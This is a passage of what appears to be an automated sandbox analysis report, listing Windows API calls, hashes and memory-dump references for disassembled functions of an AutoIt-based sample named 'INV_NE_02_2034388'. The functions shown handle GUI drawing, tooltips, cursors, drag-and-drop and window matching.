                                          • GetSysColor.USER32(0000000F), ref: 0048A928
                                          • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                          • GetSysColor.USER32(00000011), ref: 0048A945
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                          • SelectObject.GDI32(?,00000000), ref: 0048A964
                                          • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                          • SelectObject.GDI32(?,?), ref: 0048A97A
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                          • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                          • GetSysColor.USER32(00000011), ref: 0048AA4B
                                          • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                          • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                          • DeleteObject.GDI32(?), ref: 0048AA89
                                          • SelectObject.GDI32(?,?), ref: 0048AA8F
                                          • DeleteObject.GDI32(?), ref: 0048AA94
                                          • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                          • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 948a4b4d2e79d2d78f92ac1c6bb7f3af575608a4042223398e5ae106907fc06e
                                          • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                          • Opcode Fuzzy Hash: 948a4b4d2e79d2d78f92ac1c6bb7f3af575608a4042223398e5ae106907fc06e
                                          • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                          Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                          • CharNextW.USER32(0000014E), ref: 00488B01
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                          • _memset.LIBCMT ref: 00488C44
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                          • _memset.LIBCMT ref: 00488CEC
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                          • DrawMenuBar.USER32(?), ref: 00488EC3
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: 9ca3111b61a8f2a25a631b2648e7a23c8cea3a076a4d4f9465d98ca4008b93e0
                                          • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                          • Opcode Fuzzy Hash: 9ca3111b61a8f2a25a631b2648e7a23c8cea3a076a4d4f9465d98ca4008b93e0
                                          • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                          Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 004849CA
                                          • GetDesktopWindow.USER32 ref: 004849DF
                                          • GetWindowRect.USER32(00000000), ref: 004849E6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                          • DestroyWindow.USER32(?), ref: 00484A74
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                          • IsWindowVisible.USER32(?), ref: 00484B29
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                          • GetWindowRect.USER32(?,?), ref: 00484B70
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                          • CopyRect.USER32(?,?), ref: 00484BC7
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                          • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                          • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                          • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                          Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                          • _wcscpy.LIBCMT ref: 00464500
                                          • _wcscmp.LIBCMT ref: 0046450B
                                          • _wcscat.LIBCMT ref: 00464521
                                          • _wcsstr.LIBCMT ref: 0046452C
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                          • _wcscat.LIBCMT ref: 00464591
                                          • _wcscat.LIBCMT ref: 00464598
                                          • _wcsncpy.LIBCMT ref: 004645C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: 4a8df8d6b2a2f92140f321ef03a5422959a184f00704316eedf49522e9d3c310
                                          • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                          • Opcode Fuzzy Hash: 4a8df8d6b2a2f92140f321ef03a5422959a184f00704316eedf49522e9d3c310
                                          • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                          Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                          • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                          • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                          • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                          • GetStockObject.GDI32(00000011), ref: 004029CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                            • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                            • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                            • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                            • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: a3d4fa0fb9d8ca5ab3dcd1d542b52fc38b8bb78a93eca3457e18c81271885a1f
                                          • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                          • Opcode Fuzzy Hash: a3d4fa0fb9d8ca5ab3dcd1d542b52fc38b8bb78a93eca3457e18c81271885a1f
                                          • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                          Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                          • __swprintf.LIBCMT ref: 0045A51B
                                          • _wcscmp.LIBCMT ref: 0045A52E
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                          • _wcscmp.LIBCMT ref: 0045A5BF
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                          • GetDlgCtrlID.USER32(?), ref: 0045A648
                                          • GetWindowRect.USER32(?,?), ref: 0045A67E
                                          • GetParent.USER32(?), ref: 0045A69C
                                          • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                          • _wcscmp.LIBCMT ref: 0045A731
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                          • _wcscmp.LIBCMT ref: 0045A76B
                                            • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                                          • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                          • Opcode Fuzzy Hash: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                                          • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                          Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                          • _wcscmp.LIBCMT ref: 0045AF29
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                          • _wcscmp.LIBCMT ref: 0045AF8C
                                          • _wcsstr.LIBCMT ref: 0045AF9D
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                          • _wcscmp.LIBCMT ref: 0045AFE5
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                          • _wcscmp.LIBCMT ref: 0045B065
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                          • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                                          • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                          • Opcode Fuzzy Hash: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                                          • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                          Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                            • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                            • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                            • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                          • _wcscat.LIBCMT ref: 0048C6EE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                          • DragFinish.SHELL32(?), ref: 0048C75E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                          • API String ID: 169749273-3863044002
                                          • Opcode ID: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                                          • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                          • Opcode Fuzzy Hash: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                                          • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                          Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                          • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                          • Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                          • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                          Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                          • GetCursorInfo.USER32(?), ref: 004750C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$Info
                                          • String ID:
                                          • API String ID: 2577412497-0
                                          • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                          • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                          • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                          • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                          Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0048A259
                                          • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                          • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                          • GetDesktopWindow.USER32 ref: 0048A40D
